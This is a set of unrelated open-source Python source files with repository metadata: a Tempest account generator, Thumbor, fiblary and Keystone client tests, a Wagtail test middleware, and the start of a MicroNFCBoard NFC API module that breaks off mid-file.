name=subnet_name,
tenant_id=tenant_id,
enable_dhcp=True,
ip_version=4)
break
except tempest_lib.exceptions.BadRequest as e:
if 'overlaps with another subnet' not in str(e):
raise
else:
message = 'Available CIDR for subnet creation could not be found'
raise Exception(message)
return resp_body['subnet']
def _create_router(router_name):
external_net_id = dict(
network_id=CONF.network.public_network_id)
resp_body = network_admin_client.create_router(
router_name,
external_gateway_info=external_net_id,
tenant_id=tenant_id)
return resp_body['router']
def _add_router_interface(router_id, subnet_id):
network_admin_client.add_router_interface_with_subnet_id(
router_id, subnet_id)
network_name = name + "-network"
network = _create_network(network_name)
subnet_name = name + "-subnet"
subnet = _create_subnet(subnet_name, network['id'])
router_name = name + "-router"
router = _create_router(router_name)
_add_router_interface(router['id'], subnet['id'])
return network_name, router_name
def random_user_name(tag, prefix):
if tag:
return data_utils.rand_name('-'.join((tag, prefix)))
else:
return data_utils.rand_name(prefix)
def generate_resources(opts):
spec = [{'number': 1,
'prefix': 'primary',
'roles': (CONF.auth.tempest_roles +
[CONF.object_storage.operator_role])},
{'number': 1,
'prefix': 'alt',
'roles': (CONF.auth.tempest_roles +
[CONF.object_storage.operator_role])}]
if CONF.service_available.swift:
spec.append({'number': 1,
'prefix': 'swift_operator',
'roles': (CONF.auth.tempest_roles +
[CONF.object_storage.operator_role])})
spec.append({'number': 1,
'prefix': 'swift_reseller_admin',
'roles': (CONF.auth.tempest_roles +
[CONF.object_storage.reseller_admin_role])})
if CONF.service_available.heat:
spec.append({'number': 1,
'prefix': 'stack_owner',
'roles': (CONF.auth.tempest_roles +
[CONF.orchestration.stack_owner_role])})
if opts.admin:
spec.append({
'number': 1,
'prefix': 'admin',
'roles': (CONF.auth.tempest_roles +
[CONF.identity.admin_role])
})
resources = {'tenants': [],
'users': []}
for count in range(opts.concurrency):
for user_group in spec:
users = [random_user_name(opts.tag, user_group['prefix'])
for _ in range(user_group['number'])]
for user in users:
tenant = '-'.join((user, 'tenant'))
resources['tenants'].append(tenant)
resources['users'].append({
'tenant': tenant,
'name': user,
'pass': data_utils.rand_name(),
'prefix': user_group['prefix'],
'roles': user_group['roles']
})
return resources
def dump_accounts(opts, resources):
accounts = []
for user in resources['users']:
account = {
'username': user['name'],
'tenant_name': user['tenant'],
'password': user['pass'],
'roles': user['roles']
}
if 'network' or 'router' in user:
account['resources'] = {}
if 'network' in user:
account['resources']['network'] = user['network']
if 'router' in user:
account['resources']['router'] = user['router']
accounts.append(account)
if os.path.exists(opts.accounts):
os.rename(opts.accounts, '.'.join((opts.accounts, 'bak')))
with open(opts.accounts, 'w') as f:
yaml.dump(accounts, f, default_flow_style=False)
LOG.info('%s generated successfully!' % opts.accounts)
def get_options():
usage_string = ('tempest-account-generator [-h] <ARG> ...\n\n'
'To see help on specific argument, do:\n'
'tempest-account-generator <ARG> -h')
parser = argparse.ArgumentParser(
description='Create accounts.yaml file for concurrent test runs. '
'One primary user, one alt user, '
'one swift admin, one stack owner '
'and one admin (optionally) will be created '
'for each concurrent thread.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
usage=usage_string
)
parser.add_argument('-c', '--config-file',
metavar='/etc/tempest.conf',
help='path to tempest config file')
parser.add_argument('--os-username',
metavar='<auth-user-name>',
default=os.environ.get('OS_USERNAME'),
help='User should have permissions '
'to create new user accounts and '
'tenants. Defaults to env[OS_USERNAME].')
parser.add_argument('--os-password',
metavar='<auth-password>',
default=os.environ.get('OS_PASSWORD'),
help='Defaults to env[OS_PASSWORD].')
parser.add_argument('--os-tenant-name',
metavar='<auth-tenant-name>',
default=os.environ.get('OS_TENANT_NAME'),
help='Defaults to env[OS_TENANT_NAME].')
parser.add_argument('--tag',
default='',
required=False,
dest='tag',
help='Resources tag')
parser.add_argument('-r', '--concurrency',
default=1,
type=int,
required=True,
dest='concurrency',
help='Concurrency count')
parser.add_argument('--with-admin',
action='store_true',
dest='admin',
help='Creates admin for each concurrent group')
parser.add_argument('accounts',
metavar='accounts_file.yaml',
help='Output accounts yaml file')
opts = parser.parse_args()
if opts.config_file:
config.CONF.set_config_path(opts.config_file)
return opts
def main(opts=None):
if not opts:
opts = get_options()
setup_logging()
resources = generate_resources(opts)
create_resources(opts, resources)
dump_accounts(opts, resources)
if __name__ == "__main__":
main()
|
{
"content_hash": "2c99351391e5ec304f038a2d69b91432",
"timestamp": "",
"source": "github",
"line_count": 400,
"max_line_length": 79,
"avg_line_length": 39.205,
"alnum_prop": 0.5630659354674149,
"repo_name": "rakeshmi/tempest",
"id": "ce7728e68a4a21f59b54d75ad6fc201ac65a0b5e",
"size": "16306",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tempest/cmd/account_generator.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2867452"
},
{
"name": "Shell",
"bytes": "8578"
}
],
"symlink_target": ""
}
|
from pyvows import Vows, expect
from thumbor.handlers import BaseHandler
from thumbor.context import Context
from thumbor.config import Config
from thumbor.app import ThumborServiceApp
from mock import MagicMock
@Vows.batch
class BaseHandlerVows(Vows.Context):
class ShouldStoreHeaderOnContext(Vows.Context):
def topic(self):
ctx = Context(None, Config(), None)
application = ThumborServiceApp(ctx)
handler = BaseHandler(application, MagicMock())
handler._transforms = []
return handler
def should_be_ThumborServiceApp(self, topic):
mocked_context = MagicMock(**{'config.MAX_AGE_TEMP_IMAGE': 30})
topic._write_results_to_client(mocked_context, '', 'image/jpeg')
expect(mocked_context.headers).to_include('Expires')
expect(mocked_context.headers).to_include('Server')
expect(mocked_context.headers).to_include('Cache-Control')
expect(mocked_context.headers['Content-Type']).to_equal('image/jpeg')
|
{
"content_hash": "2bba3ac462bb692df13d60ba12e838fc",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 81,
"avg_line_length": 39,
"alnum_prop": 0.6752136752136753,
"repo_name": "camargoanderso/thumbor",
"id": "5205d3956051ada74e63881ade8f0bc4296ae1a3",
"size": "1305",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "vows/base_handler_vows.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "57904"
},
{
"name": "HTML",
"bytes": "1737"
},
{
"name": "JavaScript",
"bytes": "409"
},
{
"name": "Makefile",
"bytes": "1991"
},
{
"name": "Python",
"bytes": "567726"
}
],
"symlink_target": ""
}
|
"""Test rest module"""
import operator
from fiblary.common import event
from fiblary.common import exceptions
from fiblary.tests import utils
event_name = "event_1"
def fake_handler():
pass
class TestEventHook(utils.TestCase):
def setUp(self):
super(TestEventHook, self).setUp()
self.event_hook = event.EventHook(event_name)
def test_init(self):
"""Test constructor"""
self.assertEqual(repr(self.event_hook), event_name)
def test_add_remove_event(self):
"""Test adding the new event handler"""
self.assertEqual(
self.event_hook.get_handler_count(),
0,
"Incorrect initial number of handlers")
self.assertEqual(
self.event_hook.event_queue,
None,
"Event queue should not initialized")
self.event_hook += fake_handler
self.assertEqual(
self.event_hook.get_handler_count(),
1,
"Incorect number of handlers")
self.assertEqual(
type(self.event_hook.event_queue),
event.EventQueue,
"Queue should be initialized with EventQueue")
self.event_hook -= fake_handler
self.assertEqual(
self.event_hook.get_handler_count(),
0,
"Incorrect number of event handlers after subtraction")
self.assertRaises(
exceptions.HandlerNotFound,
operator.isub,
self.event_hook,
fake_handler)
|
{
"content_hash": "fc635ab5188d2d5d7c1ed71bfeaf02d6",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 67,
"avg_line_length": 24.253968253968253,
"alnum_prop": 0.5922774869109948,
"repo_name": "kstaniek/fiblary",
"id": "cb4359ff96d83a95e6d17dfb52e311ff4902b027",
"size": "2102",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fiblary/tests/unit/test_event.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "6771"
},
{
"name": "Python",
"bytes": "105397"
},
{
"name": "Shell",
"bytes": "6703"
}
],
"symlink_target": ""
}
|
from django.http import HttpResponseForbidden
from django.utils.deprecation import MiddlewareMixin
class BlockDodgyUserAgentMiddleware(MiddlewareMixin):
# Used to test that we're correctly handling responses returned from middleware during page
# previews. If a client with user agent "EvilHacker" calls an admin view that performs a
# preview, the request to /admin/... will pass this middleware, but the fake request used for
# the preview (which keeps the user agent header, but uses the URL path of the front-end page)
# will trigger a Forbidden response. In this case, the expected behaviour is to return that
# response back to the user.
def process_request(self, request):
if (
not request.path.startswith("/admin/")
and request.META.get("HTTP_USER_AGENT") == "EvilHacker"
):
return HttpResponseForbidden("Forbidden")
|
{
"content_hash": "657702c05f6a7e20cc7ad5be024d26e6",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 98,
"avg_line_length": 50.44444444444444,
"alnum_prop": 0.7191629955947136,
"repo_name": "zerolab/wagtail",
"id": "cb6521edd3ce25a7ca9afe26831882ecd6965e20",
"size": "908",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "wagtail/test/middleware.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2522"
},
{
"name": "Dockerfile",
"bytes": "2041"
},
{
"name": "HTML",
"bytes": "593037"
},
{
"name": "JavaScript",
"bytes": "615631"
},
{
"name": "Makefile",
"bytes": "1413"
},
{
"name": "Python",
"bytes": "6560334"
},
{
"name": "SCSS",
"bytes": "219204"
},
{
"name": "Shell",
"bytes": "6845"
},
{
"name": "TypeScript",
"bytes": "288102"
}
],
"symlink_target": ""
}
|
import os
import uuid
from keystoneclient.contrib.ec2 import utils as ec2_utils
from keystone import tests
from keystone.tests import test_keystoneclient
class KcMasterSqlTestCase(test_keystoneclient.KcMasterTestCase):
def config_files(self):
config_files = super(KcMasterSqlTestCase, self).config_files()
config_files.append(tests.dirs.tests_conf('backend_sql.conf'))
return config_files
def setUp(self):
super(KcMasterSqlTestCase, self).setUp()
self.default_client = self.get_client()
self.addCleanup(self.cleanup_instance('default_client'))
def test_endpoint_crud(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
service = client.services.create(name=uuid.uuid4().hex,
service_type=uuid.uuid4().hex,
description=uuid.uuid4().hex)
endpoint_region = uuid.uuid4().hex
invalid_service_id = uuid.uuid4().hex
endpoint_publicurl = uuid.uuid4().hex
endpoint_internalurl = uuid.uuid4().hex
endpoint_adminurl = uuid.uuid4().hex
# a non-existent service ID should trigger a 404
self.assertRaises(client_exceptions.NotFound,
client.endpoints.create,
region=endpoint_region,
service_id=invalid_service_id,
publicurl=endpoint_publicurl,
adminurl=endpoint_adminurl,
internalurl=endpoint_internalurl)
endpoint = client.endpoints.create(region=endpoint_region,
service_id=service.id,
publicurl=endpoint_publicurl,
adminurl=endpoint_adminurl,
internalurl=endpoint_internalurl)
self.assertEqual(endpoint_region, endpoint.region)
self.assertEqual(service.id, endpoint.service_id)
self.assertEqual(endpoint_publicurl, endpoint.publicurl)
self.assertEqual(endpoint_internalurl, endpoint.internalurl)
self.assertEqual(endpoint_adminurl, endpoint.adminurl)
client.endpoints.delete(id=endpoint.id)
self.assertRaises(client_exceptions.NotFound, client.endpoints.delete,
id=endpoint.id)
def _send_ec2_auth_request(self, credentials, client=None):
if not client:
client = self.default_client
url = '%s/ec2tokens' % self.default_client.auth_url
(resp, token) = client.request(
url=url, method='POST',
body={'credentials': credentials})
return resp, token
def _generate_default_user_ec2_credentials(self):
cred = self. default_client.ec2.create(
user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
return self._generate_user_ec2_credentials(cred.access, cred.secret)
def _generate_user_ec2_credentials(self, access, secret):
signer = ec2_utils.Ec2Signer(secret)
credentials = {'params': {'SignatureVersion': '2'},
'access': access,
'verb': 'GET',
'host': 'localhost',
'path': '/service/cloud'}
signature = signer.generate(credentials)
return credentials, signature
def test_ec2_auth_success(self):
credentials, signature = self._generate_default_user_ec2_credentials()
credentials['signature'] = signature
resp, token = self._send_ec2_auth_request(credentials)
self.assertEqual(200, resp.status_code)
self.assertIn('access', token)
def test_ec2_auth_success_trust(self):
# Add "other" role user_foo and create trust delegating it to user_two
self.assignment_api.add_role_to_user_and_project(
self.user_foo['id'],
self.tenant_bar['id'],
self.role_other['id'])
trust_id = 'atrust123'
trust = {'trustor_user_id': self.user_foo['id'],
'trustee_user_id': self.user_two['id'],
'project_id': self.tenant_bar['id'],
'impersonation': True}
roles = [self.role_other]
self.trust_api.create_trust(trust_id, trust, roles)
# Create a client for user_two, scoped to the trust
client = self.get_client(self.user_two)
ret = client.authenticate(trust_id=trust_id,
tenant_id=self.tenant_bar['id'])
self.assertTrue(ret)
self.assertTrue(client.auth_ref.trust_scoped)
self.assertEqual(trust_id, client.auth_ref.trust_id)
# Create an ec2 keypair using the trust client impersonating user_foo
cred = client.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
credentials, signature = self._generate_user_ec2_credentials(
cred.access, cred.secret)
credentials['signature'] = signature
resp, token = self._send_ec2_auth_request(credentials)
self.assertEqual(200, resp.status_code)
self.assertEqual(trust_id, token['access']['trust']['id'])
# TODO(shardy) we really want to check the roles and trustee
# but because of where the stubbing happens we don't seem to
# hit the necessary code in controllers.py _authenticate_token
# so although all is OK via a real request, it incorrect in
# this test..
def test_ec2_auth_failure(self):
from keystoneclient import exceptions as client_exceptions
credentials, signature = self._generate_default_user_ec2_credentials()
credentials['signature'] = uuid.uuid4().hex
self.assertRaises(client_exceptions.Unauthorized,
self._send_ec2_auth_request,
credentials)
def test_ec2_credential_crud(self):
creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
self.assertEqual([], creds)
cred = self.default_client.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
self.assertEqual(creds, [cred])
got = self.default_client.ec2.get(user_id=self.user_foo['id'],
access=cred.access)
self.assertEqual(cred, got)
self.default_client.ec2.delete(user_id=self.user_foo['id'],
access=cred.access)
creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
self.assertEqual([], creds)
def test_ec2_credential_crud_non_admin(self):
na_client = self.get_client(self.user_two)
creds = na_client.ec2.list(user_id=self.user_two['id'])
self.assertEqual([], creds)
cred = na_client.ec2.create(user_id=self.user_two['id'],
tenant_id=self.tenant_baz['id'])
creds = na_client.ec2.list(user_id=self.user_two['id'])
self.assertEqual(creds, [cred])
got = na_client.ec2.get(user_id=self.user_two['id'],
access=cred.access)
self.assertEqual(cred, got)
na_client.ec2.delete(user_id=self.user_two['id'],
access=cred.access)
creds = na_client.ec2.list(user_id=self.user_two['id'])
self.assertEqual([], creds)
def test_ec2_list_credentials(self):
cred_1 = self.default_client.ec2.create(
user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
cred_2 = self.default_client.ec2.create(
user_id=self.user_foo['id'],
tenant_id=self.tenant_service['id'])
cred_3 = self.default_client.ec2.create(
user_id=self.user_foo['id'],
tenant_id=self.tenant_mtu['id'])
two = self.get_client(self.user_two)
cred_4 = two.ec2.create(user_id=self.user_two['id'],
tenant_id=self.tenant_bar['id'])
creds = self.default_client.ec2.list(user_id=self.user_foo['id'])
self.assertEqual(3, len(creds))
self.assertEqual(sorted([cred_1, cred_2, cred_3],
key=lambda x: x.access),
sorted(creds, key=lambda x: x.access))
self.assertNotIn(cred_4, creds)
def test_ec2_credentials_create_404(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.NotFound,
self.default_client.ec2.create,
user_id=uuid.uuid4().hex,
tenant_id=self.tenant_bar['id'])
self.assertRaises(client_exceptions.NotFound,
self.default_client.ec2.create,
user_id=self.user_foo['id'],
tenant_id=uuid.uuid4().hex)
def test_ec2_credentials_delete_404(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.NotFound,
self.default_client.ec2.delete,
user_id=uuid.uuid4().hex,
access=uuid.uuid4().hex)
def test_ec2_credentials_get_404(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.NotFound,
self.default_client.ec2.get,
user_id=uuid.uuid4().hex,
access=uuid.uuid4().hex)
def test_ec2_credentials_list_404(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.NotFound,
self.default_client.ec2.list,
user_id=uuid.uuid4().hex)
def test_ec2_credentials_list_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.list,
user_id=self.user_foo['id'])
def test_ec2_credentials_get_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
cred = self.default_client.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.get,
user_id=self.user_foo['id'], access=cred.access)
self.default_client.ec2.delete(user_id=self.user_foo['id'],
access=cred.access)
def test_ec2_credentials_delete_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
cred = self.default_client.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.delete,
user_id=self.user_foo['id'], access=cred.access)
self.default_client.ec2.delete(user_id=self.user_foo['id'],
access=cred.access)
def test_endpoint_create_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.endpoints.create,
region=uuid.uuid4().hex,
service_id=uuid.uuid4().hex,
publicurl=uuid.uuid4().hex,
adminurl=uuid.uuid4().hex,
internalurl=uuid.uuid4().hex)
def test_endpoint_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.endpoints.delete,
id=uuid.uuid4().hex)
def test_policy_crud(self):
from keystoneclient import exceptions as client_exceptions
# FIXME(dolph): this test was written prior to the v3 implementation of
# the client and essentially refers to a non-existent
# policy manager in the v2 client. this test needs to be
# moved to a test suite running against the v3 api
self.skipTest('Written prior to v3 client; needs refactor')
client = self.get_client(admin=True)
policy_blob = uuid.uuid4().hex
policy_type = uuid.uuid4().hex
service = client.services.create(
name=uuid.uuid4().hex,
service_type=uuid.uuid4().hex,
description=uuid.uuid4().hex)
endpoint = client.endpoints.create(
service_id=service.id,
region=uuid.uuid4().hex,
adminurl=uuid.uuid4().hex,
internalurl=uuid.uuid4().hex,
publicurl=uuid.uuid4().hex)
# create
policy = client.policies.create(
blob=policy_blob,
type=policy_type,
endpoint=endpoint.id)
self.assertEqual(policy_blob, policy.policy)
self.assertEqual(policy_type, policy.type)
self.assertEqual(endpoint.id, policy.endpoint_id)
policy = client.policies.get(policy=policy.id)
self.assertEqual(policy_blob, policy.policy)
self.assertEqual(policy_type, policy.type)
self.assertEqual(endpoint.id, policy.endpoint_id)
endpoints = [x for x in client.endpoints.list() if x.id == endpoint.id]
endpoint = endpoints[0]
self.assertEqual(policy_blob, policy.policy)
self.assertEqual(policy_type, policy.type)
self.assertEqual(endpoint.id, policy.endpoint_id)
# update
policy_blob = uuid.uuid4().hex
policy_type = uuid.uuid4().hex
endpoint = client.endpoints.create(
service_id=service.id,
region=uuid.uuid4().hex,
adminurl=uuid.uuid4().hex,
internalurl=uuid.uuid4().hex,
publicurl=uuid.uuid4().hex)
policy = client.policies.update(
policy=policy.id,
blob=policy_blob,
type=policy_type,
endpoint=endpoint.id)
policy = client.policies.get(policy=policy.id)
self.assertEqual(policy_blob, policy.policy)
self.assertEqual(policy_type, policy.type)
self.assertEqual(endpoint.id, policy.endpoint_id)
# delete
client.policies.delete(policy=policy.id)
self.assertRaises(
client_exceptions.NotFound,
client.policies.get,
policy=policy.id)
policies = [x for x in client.policies.list() if x.id == policy.id]
self.assertEqual(0, len(policies))
class KcOptTestCase(KcMasterSqlTestCase):
# Set KSCTEST_PATH to the keystoneclient directory, then run this test.
#
# For example, to test your local keystoneclient,
#
# KSCTEST_PATH=/opt/stack/python-keystoneclient \
# tox -e py27 test_keystoneclient_sql.KcOptTestCase
def setUp(self):
self.checkout_info = os.environ.get('KSCTEST_PATH')
if not self.checkout_info:
self.skip('Set KSCTEST_PATH env to test with local client')
super(KcOptTestCase, self).setUp()
|
{
"content_hash": "b1536550e3764cf6b2ebf23aa5e472cf",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 79,
"avg_line_length": 43.15300546448088,
"alnum_prop": 0.585665442573129,
"repo_name": "rodrigods/keystone",
"id": "fdbd167cf2d97d4019517908e02b3cf9d281d7a4",
"size": "16380",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "keystone/tests/test_keystoneclient_sql.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "2971055"
},
{
"name": "Shell",
"bytes": "10635"
}
],
"symlink_target": ""
}
|
"""
MicroNFCBoard Python API
Copyright (c) 2014-2015 AppNearMe Ltd
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from array import array
from interface import INTERFACE, usb_backend
from transport import Transport
from nfc.ndef import URIRecord, TextRecord, SmartPosterRecord, MIMERecord
VID = 0x1FC9 #NXP VID
PID = 0x8039 #Attributed to AppNearMe
TARGET_FIRMWARE = (1, 4)
STATUS_POLLING = (1 << 0)
STATUS_CONNECTED = (1 << 1)
STATUS_NDEF_PRESENT = (1 << 2)
STATUS_NDEF_READABLE = (1 << 3)
STATUS_NDEF_WRITEABLE = (1 << 4)
STATUS_NDEF_BUSY = (1 << 5)
STATUS_NDEF_SUCCESS = (1 << 6)
STATUS_TYPE_MASK = (0xFF << 8)
STATUS_TYPE1 = (1 << 8)
STATUS_TYPE2 = (2 << 8)
STATUS_TYPE3 = (3 << 8)
STATUS_TYPE4 = (4 << 8)
STATUS_P2P = (8 << 8)
STATUS_INITIATOR = (1 << 16)
STATUS_TARGET = (0 << 16)
CHUNK_SIZE = 40
TEXT_ENCODING = {0: "utf-8", 1: "utf-16"}
class SmartPosterNestingException(Exception):
pass
class FirmwareUpgradeRequiredException(Exception):
pass
class MicroNFCBoard(object):
@staticmethod
def getBoard(number = 0):
a = INTERFACE[usb_backend].getAllConnectedInterface(VID, PID)
if((a != None) and (len(a) > number)):
return MicroNFCBoard(a[number])
return None
@staticmethod
def getAllBoards():
return [MicroNFCBoard(i) for i in INTERFACE[usb_backend].getAllConnectedInterface(VID, PID)]
def __init__(self, intf):
self._intf = intf
self._transport = Transport()
self._id = None
self._version = None
self._polling = False
self._connected = False
self._type2 = False
self._type4 = False
self._p2p = False
self._initiator = False
self._ndefPresent = False
self._ndefRecords = None
self._ndefRead = False
self._ndefReadable = False
self._ndefWriteable = False
self._ndefBusy = False
self._ndefSuccess = False
def open(self):
self._transport.open(self._intf)
version, revision, self._id = self._transport.info()
self._version = (version, revision)
if( self._version < TARGET_FIRMWARE ):
#self._transport.reset(True)
raise FirmwareUpgradeRequiredException("Your current firmware (version %d.%d) is outdated; please upgrade it to version %d.%d" % (version, revision, TARGET_FIRMWARE[0], TARGET_FIRMWARE[1]))
def close(self):
self._transport.close()
@property
def id(self):
return self._id
@property
def connected(self):
self._updateStatus()
return self._connected
@property
def type2Tag(self):
self._updateStatus()
return self._type2 and self._initiator
@property
def type4Emulator(self):
self._updateStatus()
return self._type4 and not self._initiator
@property
def p2p(self):
self._updateStatus()
return self._p2p
@property
def polling(self):
self._updateStatus()
return self._polling
@property
def ndefReadable(self):
self._updateStatus()
return self._ndefReadable
@property
def ndefWriteable(self):
self._updateStatus()
return self._ndefWriteable
@property
def ndefPresent(self):
self._updateStatus()
return self._ndefPresent
@property
def ndefBusy(self):
self._updateStatus()
return self._ndefBusy
@property
def ndefSuccess(self):
self._updateStatus()
return self._ndefSuccess
@property
def ndefRecords(self):
self._updateStatus()
if self._ndefPresent and not self._ndefRead:
self._ndefRecords = self._getNdefMessageRecords()
self._ndefRead = True
return self._ndefRecords
@ndefRecords.setter
def ndefRecords(self, records):
self._updateStatus()
self._ndefRecords = records
#Push them to device
self._setNdefRecords(self._ndefRecords)
@property
def version(self):
return self._version
def getNfcInfo(self):
return self._transport.nfcGetInfo()
def reset(self):
self._transport.reset(False)
def startPolling(self, readerWriter, emulator, p2p):
self._transport.nfcPoll(readerWriter, emulator, p2p)
def stopPolling(self):
self._transport.nfcPoll(False, False, False)
def ndefRead(self):
self._transport.nfcOperation(True, False)
def ndefWrite(self):
self._transport.nfcOperation(False, True)
def setLeds(self, led1, led2):
self._transport.leds(led1, led2)
def _updateStatus(self):
status = self._transport.status()
self._polling = (status & STATUS_POLLING) != 0
self._connected = (status & STATUS_CONNECTED) != 0
self._ndefPresent = (status & STATUS_NDEF_PRESENT) != 0
self._ndefReadable = (status & STATUS_NDEF_READABLE) != 0
self._ndefWriteable = (status & STATUS_NDEF_WRITEABLE) != 0
self._ndefBusy = (status & STATUS_NDEF_BUSY) != 0
self._ndefSuccess = (status & STATUS_NDEF_SUCCESS) != 0
self._type2 = (status & STATUS_TYPE_MASK) == STATUS_TYPE2
self._type4 = (status & STATUS_TYPE_MASK) == STATUS_TYPE4
self._p2p = (status & STATUS_TYPE_MASK) == STATUS_P2P
self._initiator = (status & STATUS_INITIATOR) != 0
if not self._ndefPresent:
self._ndefRead = False
self._ndefRecords = None
def _getNdefRecords(self, start, count):
records = []
for recordNumber in range(start, start+count):
#Get records info
recordType, recordInfo = self._transport.nfcGetRecordInfo(recordNumber)
funcs = { 0 : self._parseUnknownRecord,
1 : self._parseURIRecord,
2 : self._parseTextRecord,
3 : self._parseSmartPosterRecord,
4 : self._parseMIMERecord,
}
record = funcs[recordType](recordNumber, recordInfo)
if record != None:
records += [record]
return records
def _getNdefMessageRecords(self):
#Get message count
recordsCount = self._transport.nfcGetMessageInfo()
return self._getNdefRecords(0, recordsCount)
def _parseUnknownRecord(self, recordNumber, recordInfo):
return None
def _parseURIRecord(self, recordNumber, recordInfo):
uriPrefix = recordInfo[0]
uriLength = recordInfo[1]
uri = unicode(self._decodePrefix(uriPrefix).tostring() + self._getRecordData(recordNumber, 0, uriLength).tostring(), "utf-8")
return URIRecord(uri)
def _parseTextRecord(self, recordNumber, recordInfo):
encoding = TEXT_ENCODING[recordInfo[0]]
languageCodeLength = recordInfo[1]
textLength = recordInfo[2]
languageCode = unicode(self._getRecordData(recordNumber, 0, languageCodeLength).tostring(), "utf-8")
text = unicode(self._getRecordData(recordNumber, 1, textLength).tostring(), encoding)
return TextRecord(text, languageCode, encoding)
def _parseSmartPosterRecord(self, recordNumber, recordInfo):
recordsStart = recordInfo[0]
recordsCount = recordInfo[1]
records = self._getNdefRecords(recordsStart, recordsCount)
return SmartPosterRecord(records)
def _parseMIMERecord(self, recordNumber, recordInfo):
mimeTypeLength = recordInfo[0]
dataLength = recordInfo[1]
mimeType = unicode(self._getRecordData(recordNumber, 0, mimeTypeLength).tostring(), "utf-8")
data = self._getRecordData(recordNumber, 1, dataLength)
return MIMERecord(mimeType, data)
def _decodePrefix(self, prefix):
return self._transport.nfcDecodePrefix(prefix)
def _getRecordData(self, recordNumber, item, itemLength):
buf = array("B")
while len(buf) < itemLength:
chunkLength = min(CHUNK_SIZE, itemLength - len(buf))
buf += self._transport.nfcGetRecordData(recordNumber, item, len(buf), chunkLength)
return buf
def _setNdefRecords(self, records):
self._transport.nfcPrepareMessage(True, False)
recordNumber = 0
spRecordNumber = len(records) #Smart poster records after main records
for record in records:
spRecordNumber = self._addNdefRecord(recordNumber, record, spRecordNumber)
recordNumber += 1
self._transport.nfcSetMessageInfo(recordNumber)
self._transport.nfcPrepareMessage(False, True)
recordNumber = 0
spRecordNumber = len(records)
for record in records:
spRecordNumber = self._setNdefRecord(recordNumber, record, spRecordNumber)
recordNumber += 1
#self._transport.nfcSetMessageInfo(recordNumber)
def _addNdefRecord(self, recordNumber, record, recordsStart, spAllowed = True):
funcs = { URIRecord : self._generateURIRecord,
TextRecord : self._generateTextRecord,
SmartPosterRecord : self._generateSmartPosterRecord,
MIMERecord : self._generateMIMERecord,
}
if( not spAllowed and type(record) == SmartPosterRecord ):
raise SmartPosterNestingException()
return funcs[type(record)](recordNumber, record, recordsStart)
def _generateURIRecord(self, recordNumber, record, spRecordNumber):
#Try to get prefix
buf = array("B")
buf.fromstring(record.uri)
prefix, length = self._encodePrefix(buf[0:36])
self._transport.nfcSetRecordInfo(recordNumber, 1, [prefix, len(buf[length:])])
return spRecordNumber
def _generateTextRecord(self, recordNumber, record, spRecordNumber):
languageCodeBuf = array("B")
languageCodeBuf.fromstring(record.language)
textBuf = array("B")
textBuf.fromstring(record.text)
self._transport.nfcSetRecordInfo(recordNumber, 2, [{v: k for k, v in TEXT_ENCODING.items()}[record.encoding], len(languageCodeBuf), len(textBuf)])
return spRecordNumber
def _generateSmartPosterRecord(self, recordNumber, record, recordsStart):
self._transport.nfcSetRecordInfo(recordNumber, 3, [recordsStart, len(record.records)])
spRecordNumber = recordsStart
for spRecord in record.records:
self._addNdefRecord(spRecordNumber, spRecord, 0, False) #No sub records
spRecordNumber += 1
return spRecordNumber
def _generateMIMERecord(self, recordNumber, record, spRecordNumber):
mimeTypeBuf = array("B")
mimeTypeBuf.fromstring(record.mimeType)
dataBuf = array("B", record.data)
self._transport.nfcSetRecordInfo(recordNumber, 4, [len(mimeTypeBuf), len(dataBuf)])
return spRecordNumber
def _setNdefRecord(self, recordNumber, record, recordsStart, spAllowed = True):
funcs = { URIRecord : self._setURIRecord,
